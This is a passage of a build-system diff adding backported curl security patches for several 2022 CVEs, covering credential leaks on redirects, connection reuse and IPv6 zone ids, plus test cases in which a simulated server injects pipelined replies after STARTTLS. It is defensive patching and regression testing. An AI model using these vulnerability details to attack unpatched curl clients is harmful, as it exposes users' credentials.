63 if(imapcode != IMAP_RESP_OK) {
64 if(data->set.use_ssl != CURLUSESSL_TRY) {
65 failf(data, "STARTTLS denied");
66diff --git a/lib/pop3.c b/lib/pop3.c
67index 145b2b4..8a2d52e 100644
68--- a/lib/pop3.c
69+++ b/lib/pop3.c
70@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn,
71
72 (void)instate; /* no use for this yet */
73
74+ /* Pipelining in response is forbidden. */
75+ if(data->conn->proto.pop3c.pp.cache_size)
76+ return CURLE_WEIRD_SERVER_REPLY;
77+
78 if(pop3code != '+') {
79 if(data->set.use_ssl != CURLUSESSL_TRY) {
80 failf(data, "STARTTLS denied");
81diff --git a/lib/smtp.c b/lib/smtp.c
82index e187287..66183e2 100644
83--- a/lib/smtp.c
84+++ b/lib/smtp.c
85@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn,
86
87 (void)instate; /* no use for this yet */
88
89+ /* Pipelining in response is forbidden. */
90+ if(data->conn->proto.smtpc.pp.cache_size)
91+ return CURLE_WEIRD_SERVER_REPLY;
92+
93 if(smtpcode != 220) {
94 if(data->set.use_ssl != CURLUSESSL_TRY) {
95 failf(data, "STARTTLS denied, code %d", smtpcode);
96diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
97index 0fa6799..60e8176 100644
98--- a/tests/data/Makefile.inc
99+++ b/tests/data/Makefile.inc
100@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
101 test954 test955 test956 test957 test958 test959 test960 test961 test962 \
102 test963 test964 test965 test966 test967 test968 test969 \
103 \
104+test980 test981 test982 test983 \
105+\
106 test984 test985 test986 \
107 \
108 test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
109diff --git a/tests/data/test980 b/tests/data/test980
110new file mode 100644
111index 0000000..97567f8
112--- /dev/null
113+++ b/tests/data/test980
114@@ -0,0 +1,52 @@
115+<testcase>
116+<info>
117+<keywords>
118+SMTP
119+STARTTLS
120+</keywords>
121+</info>
122+
123+#
124+# Server-side
125+<reply>
126+<servercmd>
127+CAPA STARTTLS
128+AUTH PLAIN
129+REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted
130+REPLY AUTH 535 5.7.8 Authentication credentials invalid
131+</servercmd>
132+</reply>
133+
134+#
135+# Client-side
136+<client>
137+<features>
138+SSL
139+</features>
140+<server>
141+smtp
142+</server>
143+ <name>
144+SMTP STARTTLS pipelined server response
145+ </name>
146+<stdin>
147+mail body
148+</stdin>
149+ <command>
150+smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T -
151+</command>
152+</client>
153+
154+#
155+# Verify data after the test has been "shot"
156+<verify>
157+# 8 is CURLE_WEIRD_SERVER_REPLY
158+<errorcode>
159+8
160+</errorcode>
161+<protocol>
162+EHLO %TESTNUMBER
163+STARTTLS
164+</protocol>
165+</verify>
166+</testcase>
167diff --git a/tests/data/test981 b/tests/data/test981
168new file mode 100644
169index 0000000..2b98ce4
170--- /dev/null
171+++ b/tests/data/test981
172@@ -0,0 +1,59 @@
173+<testcase>
174+<info>
175+<keywords>
176+IMAP
177+STARTTLS
178+</keywords>
179+</info>
180+
181+#
182+# Server-side
183+<reply>
184+<servercmd>
185+CAPA STARTTLS
186+REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted
187+REPLY LOGIN A003 BAD Authentication credentials invalid
188+</servercmd>
189+</reply>
190+
191+#
192+# Client-side
193+<client>
194+<features>
195+SSL
196+</features>
197+<server>
198+imap
199+</server>
200+ <name>
201+IMAP STARTTLS pipelined server response
202+ </name>
203+ <command>
204+imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl
205+</command>
206+<file name="log/upload%TESTNUMBER">
207+Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
208+From: Fred Foobar <foobar@example.COM>
209+Subject: afternoon meeting
210+To: joe@example.com
211+Message-Id: <B27397-0100000@example.COM>
212+MIME-Version: 1.0
213+Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
214+
215+Hello Joe, do you think we can meet at 3:30 tomorrow?
216+</file>
217+</client>
218+
219+#
220+# Verify data after the test has been "shot"
221+<verify>
222+# 8 is CURLE_WEIRD_SERVER_REPLY
223+<errorcode>
224+8
225+</errorcode>
226+<protocol>
227+A001 CAPABILITY
228+A002 STARTTLS
229+</protocol>
230+</verify>
231+</testcase>
232diff --git a/tests/data/test982 b/tests/data/test982
233new file mode 100644
234index 0000000..9e07cc0
235--- /dev/null
236+++ b/tests/data/test982
237@@ -0,0 +1,57 @@
238+<testcase>
239+<info>
240+<keywords>
241+POP3
242+STARTTLS
243+</keywords>
244+</info>
245+
246+#
247+# Server-side
248+<reply>
249+<servercmd>
250+CAPA STLS USER
251+REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated
252+REPLY PASS -ERR Authentication credentials invalid
253+</servercmd>
254+<data nocheck="yes">
255+From: me@somewhere
256+To: fake@nowhere
257+
258+body
259+
260+--
261+ yours sincerely
262+</data>
263+</reply>
264+
265+#
266+# Client-side
267+<client>
268+<features>
269+SSL
270+</features>
271+<server>
272+pop3
273+</server>
274+ <name>
275+POP3 STARTTLS pipelined server response
276+ </name>
277+ <command>
278+pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl
279+ </command>
280+</client>
281+
282+#
283+# Verify data after the test has been "shot"
284+<verify>
285+# 8 is CURLE_WEIRD_SERVER_REPLY
286+<errorcode>
287+8
288+</errorcode>
289+<protocol>
290+CAPA
291+STLS
292+</protocol>
293+</verify>
294+</testcase>
295diff --git a/tests/data/test983 b/tests/data/test983
296new file mode 100644
297index 0000000..300ec45
298--- /dev/null
299+++ b/tests/data/test983
300@@ -0,0 +1,52 @@
301+<testcase>
302+<info>
303+<keywords>
304+FTP
305+STARTTLS
306+</keywords>
307+</info>
308+
309+#
310+# Server-side
311+<reply>
312+<servercmd>
313+REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete
314+REPLY PASS 530 Login incorrect
315+</servercmd>
316+</reply>
317+
318+# Client-side
319+<client>
320+<features>
321+SSL
322+</features>
323+<server>
324+ftp
325+</server>
326+ <name>
327+FTP STARTTLS pipelined server response
328+ </name>
329+<file name="log/test%TESTNUMBER.txt">
330+data
331+ to
332+ see
333+that FTPS
334+works
335+ so does it?
336+</file>
337+ <command>
338+--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP
339+</command>
340+</client>
341+
342+# Verify data after the test has been "shot"
343+<verify>
344+# 8 is CURLE_WEIRD_SERVER_REPLY
345+<errorcode>
346+8
347+</errorcode>
348+<protocol>
349+AUTH SSL
350+</protocol>
351+</verify>
352+</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2022-22576.patch b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
new file mode 100644
index 0000000000..13479e7f0e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
@@ -0,0 +1,148 @@
1From 852aa5ad351ea53e5f01d2f44b5b4370c2bf5425 Mon Sep 17 00:00:00 2001
2From: Patrick Monnerat <patrick@monnerat.net>
3Date: Mon, 25 Apr 2022 11:44:05 +0200
4Subject: [PATCH] url: check sasl additional parameters for connection reuse.
5
6Also move static function safecmp() as non-static Curl_safecmp() since
7its purpose is needed at several places.
8
9Bug: https://curl.se/docs/CVE-2022-22576.html
10
11CVE-2022-22576
12
13Closes #8746
14---
15 lib/strcase.c | 10 ++++++++++
16 lib/strcase.h | 2 ++
17 lib/url.c | 13 ++++++++++++-
18 lib/urldata.h | 1 +
19 lib/vtls/vtls.c | 21 ++++++---------------
20 5 files changed, 31 insertions(+), 16 deletions(-)
21
22CVE: CVE-2022-22576
23Upstream-Status: Backport [https://github.com/curl/curl/commit/852aa5ad351ea53e5f01d2f44b5b4370c2bf5425.patch]
24Comment: Refreshed patch
25Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
26
27diff --git a/lib/strcase.c b/lib/strcase.c
28index dd46ca1ba0e5..692a3f14aee7 100644
29--- a/lib/strcase.c
30+++ b/lib/strcase.c
31@@ -251,6 +251,16 @@
32 } while(*src++ && --n);
33 }
34
35+/* Compare case-sensitive NUL-terminated strings, taking care of possible
36+ * null pointers. Return true if arguments match.
37+ */
38+bool Curl_safecmp(char *a, char *b)
39+{
40+ if(a && b)
41+ return !strcmp(a, b);
42+ return !a && !b;
43+}
44+
45 /* --- public functions --- */
46
47 int curl_strequal(const char *first, const char *second)
48diff --git a/lib/strcase.h b/lib/strcase.h
49index b234d3815220..2635f5117e99 100644
50--- a/lib/strcase.h
51+++ b/lib/strcase.h
52@@ -48,4 +48,6 @@
53 void Curl_strntoupper(char *dest, const char *src, size_t n);
54 void Curl_strntolower(char *dest, const char *src, size_t n);
55
56+bool Curl_safecmp(char *a, char *b);
57+
58 #endif /* HEADER_CURL_STRCASE_H */
59diff --git a/lib/url.c b/lib/url.c
60index 9a988b4d58d8..e1647b133854 100644
61--- a/lib/url.c
62+++ b/lib/url.c
63@@ -730,6 +730,7 @@
64 Curl_safefree(conn->allocptr.host);
65 Curl_safefree(conn->allocptr.cookiehost);
66 Curl_safefree(conn->allocptr.rtsp_transport);
67+ Curl_safefree(conn->oauth_bearer);
68 Curl_safefree(conn->trailer);
69 Curl_safefree(conn->host.rawalloc); /* host name buffer */
70 Curl_safefree(conn->conn_to_host.rawalloc); /* host name buffer */
71@@ -1251,7 +1252,9 @@
72 /* This protocol requires credentials per connection,
73 so verify that we're using the same name and password as well */
74 if(strcmp(needle->user, check->user) ||
75- strcmp(needle->passwd, check->passwd)) {
76+ strcmp(needle->passwd, check->passwd) ||
77+ !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
78+ !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
79 /* one of them was different */
80 continue;
81 }
82@@ -3392,6 +3395,14 @@
83 result = CURLE_OUT_OF_MEMORY;
84 goto out;
85 }
86+ }
87+
88+ if(data->set.str[STRING_BEARER]) {
89+ conn->oauth_bearer = strdup(data->set.str[STRING_BEARER]);
90+ if(!conn->oauth_bearer) {
91+ result = CURLE_OUT_OF_MEMORY;
92+ goto out;
93+ }
94 }
95
96 #ifdef USE_UNIX_SOCKETS
97diff --git a/lib/urldata.h b/lib/urldata.h
98index 07eb19b87034..1d89b8d7fa68 100644
99--- a/lib/urldata.h
100+++ b/lib/urldata.h
101@@ -949,6 +949,8 @@
102
103 char *sasl_authzid; /* authorisation identity string, allocated */
104
105+ char *oauth_bearer; /* OAUTH2 bearer, allocated */
106+
107 int httpversion; /* the HTTP version*10 reported by the server */
108 int rtspversion; /* the RTSP version*10 reported by the server */
109
110diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
111index 03b85ba065e5..a40ac06f684f 100644
112--- a/lib/vtls/vtls.c
113+++ b/lib/vtls/vtls.c
114@@ -82,15 +82,6 @@
115 else \
116 dest->var = NULL;
117
118-static bool safecmp(char *a, char *b)
119-{
120- if(a && b)
121- return !strcmp(a, b);
122- else if(!a && !b)
123- return TRUE; /* match */
124- return FALSE; /* no match */
125-}
126-
127
128 bool
129 Curl_ssl_config_matches(struct ssl_primary_config* data,
130@@ -101,12 +101,12 @@
131 (data->verifypeer == needle->verifypeer) &&
132 (data->verifyhost == needle->verifyhost) &&
133 (data->verifystatus == needle->verifystatus) &&
134- safecmp(data->CApath, needle->CApath) &&
135- safecmp(data->CAfile, needle->CAfile) &&
136- safecmp(data->issuercert, needle->issuercert) &&
137- safecmp(data->clientcert, needle->clientcert) &&
138- safecmp(data->random_file, needle->random_file) &&
139- safecmp(data->egdsocket, needle->egdsocket) &&
140+ Curl_safecmp(data->CApath, needle->CApath) &&
141+ Curl_safecmp(data->CAfile, needle->CAfile) &&
142+ Curl_safecmp(data->issuercert, needle->issuercert) &&
143+ Curl_safecmp(data->clientcert, needle->clientcert) &&
144+ Curl_safecmp(data->random_file, needle->random_file) &&
145+ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
146 Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
147 Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
148 Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
new file mode 100644
index 0000000000..063c11712a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
@@ -0,0 +1,45 @@
1From 2a797e099731facf62a2c675396334bc2ad3bc7c Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 25 Apr 2022 16:24:33 +0200
4Subject: [PATCH] connect: store "conn_remote_port" in the info struct
5
6To make it available after the connection ended.
7
8Prerequisite for the patches that address CVE-2022-27774.
9
10Upstream-Status: Backport [https://github.com/curl/curl/commit/08b8ef4e726ba10f45081ecda5b3cea788d3c839]
11Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
12---
13 lib/connect.c | 1 +
14 lib/urldata.h | 6 +++++-
15 2 files changed, 6 insertions(+), 1 deletion(-)
16
17diff --git a/lib/connect.c b/lib/connect.c
18index b3d4057..a977d67 100644
19--- a/lib/connect.c
20+++ b/lib/connect.c
21@@ -624,6 +624,7 @@ void Curl_persistconninfo(struct connectdata *conn)
22 conn->data->info.conn_scheme = conn->handler->scheme;
23 conn->data->info.conn_protocol = conn->handler->protocol;
24 conn->data->info.conn_primary_port = conn->primary_port;
25+ conn->data->info.conn_remote_port = conn->remote_port;
26 conn->data->info.conn_local_port = conn->local_port;
27 }
28
29diff --git a/lib/urldata.h b/lib/urldata.h
30index fafb7a3..ab1b267 100644
31--- a/lib/urldata.h
32+++ b/lib/urldata.h
33@@ -1148,7 +1148,11 @@ struct PureInfo {
34 reused, in the connection cache. */
35
36 char conn_primary_ip[MAX_IPADR_LEN];
37- long conn_primary_port;
38+ long conn_primary_port; /* this is the destination port to the connection,
39+ which might have been a proxy */
40+ long conn_remote_port; /* this is the "remote port", which is the port
41+ number of the used URL, independent of proxy or
42+ not */
43 char conn_local_ip[MAX_IPADR_LEN];
44 long conn_local_port;
45 const char *conn_scheme;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
new file mode 100644
index 0000000000..c64d614194
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
@@ -0,0 +1,80 @@
1From 5c2f3b3a5f115625134669d90d591de9c5aafc8e Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 25 Apr 2022 16:24:33 +0200
4Subject: [PATCH] transfer: redirects to other protocols or ports clear auth
5
6... unless explicitly permitted.
7
8Bug: https://curl.se/docs/CVE-2022-27774.html
9Reported-by: Harry Sintonen
10Closes #8748
11
12Upstream-Status: Backport [https://github.com/curl/curl/commit/620ea21410030a9977396b4661806bc187231b79]
13Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
14---
15 lib/transfer.c | 49 ++++++++++++++++++++++++++++++++++++++++++++++++-
16 1 file changed, 48 insertions(+), 1 deletion(-)
17
18diff --git a/lib/transfer.c b/lib/transfer.c
19index 744e1c0..ac69d27 100644
20--- a/lib/transfer.c
21+++ b/lib/transfer.c
22@@ -1627,10 +1627,57 @@ CURLcode Curl_follow(struct Curl_easy *data,
23 return CURLE_OUT_OF_MEMORY;
24 }
25 else {
26-
27 uc = curl_url_get(data->state.uh, CURLUPART_URL, &newurl, 0);
28 if(uc)
29 return Curl_uc_to_curlcode(uc);
30+
31+ /* Clear auth if this redirects to a different port number or protocol,
32+ unless permitted */
33+ if(!data->set.allow_auth_to_other_hosts && (type != FOLLOW_FAKE)) {
34+ char *portnum;
35+ int port;
36+ bool clear = FALSE;
37+
38+ if(data->set.use_port && data->state.allow_port)
39+ /* a custom port is used */
40+ port = (int)data->set.use_port;
41+ else {
42+ uc = curl_url_get(data->state.uh, CURLUPART_PORT, &portnum,
43+ CURLU_DEFAULT_PORT);
44+ if(uc) {
45+ free(newurl);
46+ return Curl_uc_to_curlcode(uc);
47+ }
48+ port = atoi(portnum);
49+ free(portnum);
50+ }
51+ if(port != data->info.conn_remote_port) {
52+ infof(data, "Clear auth, redirects to port from %u to %u",
53+ data->info.conn_remote_port, port);
54+ clear = TRUE;
55+ }
56+ else {
57+ char *scheme;
58+ const struct Curl_handler *p;
59+ uc = curl_url_get(data->state.uh, CURLUPART_SCHEME, &scheme, 0);
60+ if(uc) {
61+ free(newurl);
62+ return Curl_uc_to_curlcode(uc);
63+ }
64+
65+ p = Curl_builtin_scheme(scheme);
66+ if(p && (p->protocol != data->info.conn_protocol)) {
67+ infof(data, "Clear auth, redirects scheme from %s to %s",
68+ data->info.conn_scheme, scheme);
69+ clear = TRUE;
70+ }
71+ free(scheme);
72+ }
73+ if(clear) {
74+ Curl_safefree(data->set.str[STRING_USERNAME]);
75+ Curl_safefree(data->set.str[STRING_PASSWORD]);
76+ }
77+ }
78 }
79
80 if(type == FOLLOW_FAKE) {
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
new file mode 100644
index 0000000000..a585f6a8fa
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
@@ -0,0 +1,83 @@
1From 5dccf21ad49eed925e8f76b0cb844877239ce23d Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 25 Apr 2022 17:59:15 +0200
4Subject: [PATCH] openssl: don't leak the SRP credentials in redirects either
5
6Follow-up to 620ea21410030
7
8Reported-by: Harry Sintonen
9Closes #8751
10
11Upstream-Status: Backport [https://github.com/curl/curl/commit/139a54ed0a172adaaf1a78d6f4fff50b2c3f9e08]
12Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
13---
14 lib/http.c | 10 +++++-----
15 lib/http.h | 6 ++++++
16 lib/vtls/openssl.c | 3 ++-
17 3 files changed, 13 insertions(+), 6 deletions(-)
18
19diff --git a/lib/http.c b/lib/http.c
20index 8b16c09..5291c07 100644
21--- a/lib/http.c
22+++ b/lib/http.c
23@@ -732,10 +732,10 @@ output_auth_headers(struct connectdata *conn,
24 }
25
26 /*
27- * allow_auth_to_host() tells if autentication, cookies or other "sensitive
28- * data" can (still) be sent to this host.
29+ * Curl_allow_auth_to_host() tells if authentication, cookies or other
30+ * "sensitive data" can (still) be sent to this host.
31 */
32-static bool allow_auth_to_host(struct Curl_easy *data)
33+bool Curl_allow_auth_to_host(struct Curl_easy *data)
34 {
35 struct connectdata *conn = data->conn;
36 return (!data->state.this_is_a_follow ||
37@@ -816,7 +816,7 @@ Curl_http_output_auth(struct connectdata *conn,
38
39 /* To prevent the user+password to get sent to other than the original host
40 due to a location-follow */
41- if(allow_auth_to_host(data)
42+ if(Curl_allow_auth_to_host(data)
43 || conn->bits.netrc
44 )
45 result = output_auth_headers(conn, authhost, request, path, FALSE);
46@@ -1891,7 +1891,7 @@ CURLcode Curl_add_custom_headers(struct connectdata *conn,
47 checkprefix("Cookie:", compare)) &&
48 /* be careful of sending this potentially sensitive header to
49 other hosts */
50- !allow_auth_to_host(data))
51+ !Curl_allow_auth_to_host(data))
52 ;
53 else {
54 result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
55diff --git a/lib/http.h b/lib/http.h
56index 4c1825f..4fbae1d 100644
57--- a/lib/http.h
58+++ b/lib/http.h
59@@ -273,4 +273,10 @@ Curl_http_output_auth(struct connectdata *conn,
60 bool proxytunnel); /* TRUE if this is the request setting
61 up the proxy tunnel */
62
63+/*
64+ * Curl_allow_auth_to_host() tells if authentication, cookies or other
65+ * "sensitive data" can (still) be sent to this host.
66+ */
67+bool Curl_allow_auth_to_host(struct Curl_easy *data);
68+
69 #endif /* HEADER_CURL_HTTP_H */
70diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
71index 006a8c8..a14cecc 100644
72--- a/lib/vtls/openssl.c
73+++ b/lib/vtls/openssl.c
74@@ -2739,7 +2739,8 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
75 #endif
76
77 #ifdef USE_TLS_SRP
78- if(ssl_authtype == CURL_TLSAUTH_SRP) {
79+ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
80+ Curl_allow_auth_to_host(data)) {
81 char * const ssl_username = SSL_SET_OPTION(username);
82
83 infof(data, "Using TLS-SRP username: %s\n", ssl_username);
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
new file mode 100644
index 0000000000..2258681cab
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
@@ -0,0 +1,35 @@
1From 7395752e2f7b87dc8c8f2a7137075e2da554aaea Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Tue, 26 Apr 2022 07:46:19 +0200
4Subject: [PATCH] gnutls: don't leak the SRP credentials in redirects
5
6Follow-up to 620ea21410030 and 139a54ed0a172a
7
8Reported-by: Harry Sintonen
9Closes #8752
10
11Upstream-Status: Backport [https://github.com/curl/curl/commit/093531556203decd92d92bccd431edbe5561781c]
12Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
13---
14 lib/vtls/gtls.c | 6 +++---
15 1 file changed, 3 insertions(+), 3 deletions(-)
16
17diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
18index 8c05102..3d0758d 100644
19--- a/lib/vtls/gtls.c
20+++ b/lib/vtls/gtls.c
21@@ -581,11 +581,11 @@ gtls_connect_step1(struct connectdata *conn,
22 }
23
24 #ifdef USE_TLS_SRP
25- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
26+ if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
27+ Curl_allow_auth_to_host(data)) {
28 infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
29
30- rc = gnutls_srp_allocate_client_credentials(
31- &BACKEND->srp_client_cred);
32+ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
33 if(rc != GNUTLS_E_SUCCESS) {
34 failf(data, "gnutls_srp_allocate_client_cred() failed: %s",
35 gnutls_strerror(rc));
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27775.patch b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
new file mode 100644
index 0000000000..b3fe7b4494
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
@@ -0,0 +1,39 @@
1From 058f98dc3fe595f21dc26a5b9b1699e519ba5705 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 25 Apr 2022 11:48:00 +0200
4Subject: [PATCH] conncache: include the zone id in the "bundle" hashkey
5
6Make connections to two separate IPv6 zone ids create separate
7connections.
8
9Reported-by: Harry Sintonen
10Bug: https://curl.se/docs/CVE-2022-27775.html
11Closes #8747
12---
13 lib/conncache.c | 8 ++++++--
14 1 file changed, 6 insertions(+), 2 deletions(-)
15
16CVE: CVE-2022-27775
17Upstream-Status: Backport [https://github.com/curl/curl/commit/058f98dc3fe595f21dc26a5b9b1699e519ba5705.patch]
18Comment: Refreshed patch
19Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
20
21diff --git a/lib/conncache.c b/lib/conncache.c
22index ec669b971dc3..8948b53fa500 100644
23--- a/lib/conncache.c
24+++ b/lib/conncache.c
25@@ -156,8 +156,12 @@
26 /* report back which name we used */
27 *hostp = hostname;
28
29- /* put the number first so that the hostname gets cut off if too long */
30- msnprintf(buf, len, "%ld%s", port, hostname);
31+ /* put the numbers first so that the hostname gets cut off if too long */
32+#ifdef ENABLE_IPV6
33+ msnprintf(buf, len, "%u/%ld/%s", conn->scope_id, port, hostname);
34+#else
35+ msnprintf(buf, len, "%ld/%s", port, hostname);
36+#endif
37 }
38
39 /* Returns number of connections currently held in the connection cache.
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27776.patch b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
new file mode 100644
index 0000000000..1a13df2d95
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
@@ -0,0 +1,114 @@
1From 6e659993952aa5f90f48864be84a1bbb047fc258 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 25 Apr 2022 13:05:40 +0200
4Subject: [PATCH] http: avoid auth/cookie on redirects same host diff port
5
6CVE-2022-27776
7
8Reported-by: Harry Sintonen
9Bug: https://curl.se/docs/CVE-2022-27776.html
10Closes #8749
11---
12 lib/http.c | 34 ++++++++++++++++++++++------------
13 lib/urldata.h | 16 +++++++++-------
14 2 files changed, 31 insertions(+), 19 deletions(-)
15
16CVE: CVE-2022-27776
17Upstream-Status: Backport [https://github.com/curl/curl/commit/6e659993952aa5f90f48864be84a1bbb047fc258.patch]
18Comment: Refreshed patch
19Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
20
21diff --git a/lib/http.c b/lib/http.c
22index ce79fc4e31c8..f0476f3b9272 100644
23--- a/lib/http.c
24+++ b/lib/http.c
25@@ -731,6 +731,21 @@
26 return CURLE_OK;
27 }
28
29+/*
30+ * allow_auth_to_host() tells if autentication, cookies or other "sensitive
31+ * data" can (still) be sent to this host.
32+ */
33+static bool allow_auth_to_host(struct Curl_easy *data)
34+{
35+ struct connectdata *conn = data->conn;
36+ return (!data->state.this_is_a_follow ||
37+ data->set.allow_auth_to_other_hosts ||
38+ (data->state.first_host &&
39+ strcasecompare(data->state.first_host, conn->host.name) &&
40+ (data->state.first_remote_port == conn->remote_port) &&
41+ (data->state.first_remote_protocol == conn->handler->protocol)));
42+}
43+
44 /**
45 * Curl_http_output_auth() setups the authentication headers for the
46 * host/proxy and the correct authentication
47@@ -799,15 +799,12 @@
48 with it */
49 authproxy->done = TRUE;
50
51- /* To prevent the user+password to get sent to other than the original
52- host due to a location-follow, we do some weirdo checks here */
53- if(!data->state.this_is_a_follow ||
54- conn->bits.netrc ||
55- !data->state.first_host ||
56- data->set.allow_auth_to_other_hosts ||
57- strcasecompare(data->state.first_host, conn->host.name)) {
58+ /* To prevent the user+password to get sent to other than the original host
59+ due to a location-follow */
60+ if(allow_auth_to_host(data)
61+ || conn->bits.netrc
62+ )
63 result = output_auth_headers(conn, authhost, request, path, FALSE);
64- }
65 else
66 authhost->done = TRUE;
67
68@@ -1879,10 +1891,7 @@
69 checkprefix("Cookie:", compare)) &&
70 /* be careful of sending this potentially sensitive header to
71 other hosts */
72- (data->state.this_is_a_follow &&
73- data->state.first_host &&
74- !data->set.allow_auth_to_other_hosts &&
75- !strcasecompare(data->state.first_host, conn->host.name)))
76+ !allow_auth_to_host(data))
77 ;
78 else {
79 result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
80@@ -2065,6 +2074,7 @@
81 return CURLE_OUT_OF_MEMORY;
82
83 data->state.first_remote_port = conn->remote_port;
84+ data->state.first_remote_protocol = conn->handler->protocol;
85 }
86
87 if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
88diff --git a/lib/urldata.h b/lib/urldata.h
89index 1d89b8d7fa68..ef2174d9e727 100644
90--- a/lib/urldata.h
91+++ b/lib/urldata.h
92@@ -1342,13 +1342,15 @@
93 char *ulbuf; /* allocated upload buffer or NULL */
94 curl_off_t current_speed; /* the ProgressShow() function sets this,
95 bytes / second */
96- char *first_host; /* host name of the first (not followed) request.
97- if set, this should be the host name that we will
98- sent authorization to, no else. Used to make Location:
99- following not keep sending user+password... This is
100- strdup() data.
101- */
102- int first_remote_port; /* remote port of the first (not followed) request */
103+
104+ /* host name, port number and protocol of the first (not followed) request.
105+ if set, this should be the host name that we will sent authorization to,
106+ no else. Used to make Location: following not keep sending user+password.
107+ This is strdup()ed data. */
108+ char *first_host;
109+ int first_remote_port;
110+ unsigned int first_remote_protocol;
111+
112 struct curl_ssl_session *session; /* array of 'max_ssl_sessions' size */
113 long sessionage; /* number of the most recent session */
114 unsigned int tempcount; /* number of entries in use in tempwrite, 0 - 3 */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27781.patch b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
new file mode 100644
index 0000000000..ea1bc22928
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
@@ -0,0 +1,46 @@
1From 7a1f183039a6a6c9099a114f5e5c94777413c767 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 9 May 2022 10:07:15 +0200
4Subject: [PATCH] nss: return error if seemingly stuck in a cert loop
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9CVE-2022-27781
10
11Reported-by: Florian Kohnhäuser
12Bug: https://curl.se/docs/CVE-2022-27781.html
13Closes #8822
14
